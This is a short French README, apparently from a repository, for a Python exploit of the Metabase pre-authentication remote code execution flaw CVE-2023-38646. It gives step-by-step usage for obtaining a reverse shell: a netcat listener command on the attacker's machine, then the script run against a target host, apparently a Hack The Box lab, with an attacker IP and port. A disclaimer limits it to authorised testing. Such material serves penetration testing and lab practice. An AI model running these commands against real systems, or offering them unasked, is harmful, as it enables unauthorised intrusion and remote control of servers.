
Exploit Python pour la RCE pré-authentification de Metabase (CVE-2023-38646) qui établit un shell inversé pour des tests de sécurité autorisés.
⚠️ À des fins éducatives et de recherche de sécurité autorisées uniquement
Très reconnaissant à l'auteur original du PoC securezeron
Configurez l'écouteur sur votre machine attaquante :
nc -nlvp 4444
Ensuite, exécutez cette commande :
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
